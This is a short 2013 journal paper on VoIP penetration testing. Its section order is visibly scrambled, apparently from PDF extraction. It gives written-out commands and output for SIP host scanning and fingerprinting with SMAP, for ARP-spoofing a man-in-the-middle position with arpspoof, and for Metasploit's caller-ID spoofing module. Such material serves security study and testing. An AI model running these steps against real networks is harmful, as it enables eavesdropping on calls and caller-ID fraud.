International Journal of Scientific Research Engineering & Technology (IJSRET)

Volume 2 Issue 6 pp 345-347 September 2013 www.ijsret.org ISSN 2278 0882

Performance analysis of VOIP technology on the ground of penetration testing

Laxman Vishnoi M.Tech(I.T.) I.T.M. College Bhilwara (Rajasthan) Mohammad Ishak Tank M.Tech(C.S..) Pacific University Udaipur (Rajasthan)

Abstract- VoIP is a technology providing many benefits and cost economic methods for better communication. Now a days, more and more small businesses and enterprises are substituting their old conventional PSTNs with an IP based ones. A VoIP based PBX can provide us many features like Multiple Extensions, Caller ID, Voice mail, IVR capabilities, Recording, Logging, Usage with hardware based telephones or software based. In market, there are many vendors for PBX, IP telephones, VoIP services and equipment such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON etc. With evolution of technology, comes a new challenge for both the defensive and offensive faces of security aspect, One of the great disadvantages of traditional phone communication was that it was prone to eavesdropping. It can be achieved in a way to physically connect a small transmitter which was connected either inside or outside their premises somewhere along the phone cord. In this paper we will be covering the following attack vectors. They are as scanning phase, sniffing phase and then finally spoofing demo. Keywords- Penetration Testing, VOIP, Spoofing.

provider PSTN via a SIP Trunk/PRI, the VoIP traffic flows through a dedicated VLAN. Hosted Services Just a switch, a router, IP phones and a connection to the service provider PBX via internet or IP/VPN connection, each phone is configured with SIP account information. There is no requirement for a PBX at site. Online SIP Service Services like sipme.me provides an application for PC or smart phones with a free sip account, They are offering low price for international calls as well as free calls between the service users by assigning a phone number to subscribers individually. The SIP (Session Initiation Protocol) role is to establish, end or modify a voice or a video call where the voice and/or video traffic are being carried by a protocol like RTP (Real time transport Protocol). It is an application layer protocol using UDP for transport (TCP and SCTP can be used as well).

II. SCANNING PHASE

We are using SMAP for scanning purpose. Let see how we practically do all this. We will get to know how SMAP is used for both scanning single host or multiple range of IP address. Let us begin with scanning single host in the following commands. root@bt:/pentest/voip/smap# ./smap smap 0.6.0 http:// <webaddress> usage: smap [ Options ] -h: this help -d: increase debugging -o: enable fingerprinting -O: enable more verbose fingerprinting -l: fingerprint learning mode -t: TCP transport -u: UDP transport (default -P0: Treat all hosts as online - skip host discovery -p : destination port -r : messages per second rate limit

I. INTRODUCTION
When we talk about Web based applications, few hold more promise than Voice Over IP (VOIP). VOIP allows businesses as well as consumers alike to save enormous amount of money on their phone bills by making phone calls over the Internet. As great as this technology is though, it does have its disadvantages. For actually exposing those vulnerabilities we make use of penetration testing. There are several ways for implementing IP based telephony; some common topologies and usage are shown below: Self Hosted A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony service

IJSRET @ 2013

International Journal of Scientific Research Engineering & Technology (IJSRET)

Volume 2 Issue 6 pp 345-347 September 2013 www.ijsret.org ISSN 2278 0882

-D : SIP domain to use without leading sip: -w : timeout in msec root@bt:/pentest/voip/smap# ./smap 192.168.1.128 smap 0.6.0 http://www.websitename.net/ 192.168.1.128: ICMP reachable, SIP enabled 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%) Now follow the following commands in case of scanning a range of IP address. root@bt:/pentest/voip/smap# ./smap 192.168.1.* smap 0.6.0 http:// <webaddress> 192.168.1.20: ICMP reachable, SIP enabled 192.168.1.22: ICMP reachable, SIP enabled 192.168.1.0: ICMP unreachable, SIP disabled 192.168.1.1: ICMP unreachable, SIP disabled 192.168.1.2: ICMP unreachable, SIP disabled 192.168.1.3: ICMP unreachable, SIP disabled ----EDIT--192.168.1.250: ICMP unreachable, SIP disabled 192.168.1.251: ICMP unreachable, SIP disabled 192.168.1.252: ICMP unreachable, SIP disabled 192.168.1.253: ICMP unreachable, SIP disabled 192.168.1.254: ICMP unreachable, SIP disabled 192.168.1.255: ICMP unreachable, SIP disabled 256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%) Till now that we are done with identification of sip enabled hosts. So now we can use SMAP to fingerprint the server/client type and version. It is shown in following commands. root@bt:/pentest/voip/smap# ./smap -O 192.168.1.128 smap 0.6.0 http:// <webaddress> 192.168.1.128: ICMP reachable, SIP enabled best guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579 User-Agent: Asterisk PBX 1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

in case we can invoke it from anywhere by typing: arpspoof. Before using arpspoof we need to enable IP forwarding using following syntax: root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof syntax: root@bt:~# arpspoof Version: 2.4 Usage: arpspoof [-i interface] [-t target] host For a successful MITM attack we will need to spoof both ways: arpspoof t victim gateway arpspoof t gateway victim

IV. SPOOFING CALLER ID

The voip/sip_invite_spoof auxiliary will create a fake SIP invite request making the targeted device ring and display fake caller id information. Auxiliary Options are as follows: msf > use voip/sip_invite_spoof msf auxiliary(sip_invite_spoof) > show options Module options (auxiliary/voip/sip_invite_spoof): Name Current Setting Required Description ---- --------------- ------------------MSG yes The spoofed caller id to send RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from THREADS 1 yes The number of concurrent threads msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(sip_invite_spoof) > run [*] Sending Fake SIP Invite to: 192.168.1.104 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

III. SNIFFING PHASE

Before we begin to sniff traffic we will need to arp poison our switch or gateway. For this purpose, well be using a tool called Arpspoof which is located in /usr/sbin/Arpspoof directory in Backtrack operating system, or just

V. CONCLUSION SCOPE

AND

FUTURE

Another issue is that unlike a traditional phone, a VOIP system (computer or VOIP phone based) is futile during a power outage. A traditional phone can function even during a power outage because the phone company transmits electricity over the phone line. This electricity is used to power the phone (cordless phones being the exception). So in this way, even if the power goes out, the phone

IJSRET @ 2013

International Journal of Scientific Research Engineering & Technology (IJSRET)

Volume 2 Issue 6 pp 345-347 September 2013 www.ijsret.org ISSN 2278 0882

will usually still work because the phones power is coming from a different source. Eavesdropping is the act of secretly listening to the private conversation of others without their permission, as defined by Black's Law Dictionary. VoIP communications software is also vulnerable to electronic eavesdropping via malware infections such as trojans. Caller ID is spoofed through a variety of methods and different technology. The most popular ways of spoofing Caller ID are through the use of VoIP or PRI lines as discussed in this paper.

REFERENCES
[1] A comparison of sip and h.323 for internet telephony henning schulzrinne department of computer science, Columbia university new York. [2] A comprehensive survey on a promising technology Stylianos Karapantazis, Fotini [3] Niovi Pavlidou Department of Electrical and Computer Engineering, Aristotle University of Thessaloniki, Panepistimioupoli, 54124 Thessaloniki, Greece. [4] A Survey on Voice over IP over Wireless LANs Haniyeh Seedorf, J., SIP Security: Status Quo and Future Issues, Talk presented at 23rd Chaos Communication Congress, 2006 [5] K. M. McNeill, M. Liu and J. J. Rodriguez, "An Adaptive Jitter Buffer PlayOut Scheme to Improve VoIP Quality inWireless Networks",

IEEE Conf. on BAE Systems Network Enabled Solutions, Washington, 2006. [6] D. Richard Kuhn, Thomas J. Walsh, Steffen Fries,Security Considerations for Voice over IP Systems, Recommendations of the National Institute of Standards and Technology, NIST Special Publication 800-58, 2005. [7] Bishop M. About Penetration Testing". Security and privacy IEEE Nov-Dec 2007. Volume 5 Page(s): 84 87. [8] J. B. Meisel, M. Needles, Voice over Internet protocol (VoIP) development and public policy implications, Info 7, 2005 [9]. Robinson, S. Art of Penetration Testing Security of Distributed Control Systems, 2005. The IEEE Seminar on Date : 2 Nov. 2005. [10] comparison of sip and h.323 for internet telephony henning schulzrinne department of computer science, Columbia unive rsity new York. [11] Comparative Analysis of Traditional Telephone and Voice over Internet Protocol (VoIP) Systems Hui Min Chong and H.Scott Matthews* Department of Civil and Environmental Engineering Carnegie Mellon University Pittsburgh, PA USA. [12] P. M. Athina., A. T. Fouad and J. K. Mansour, "Assessing the Quality of Voice Communications Over Internet Backbones", IEEE/ACM Transactions on Networking, Vol. 11, No. 5, Oct. 2003.

IJSRET @ 2013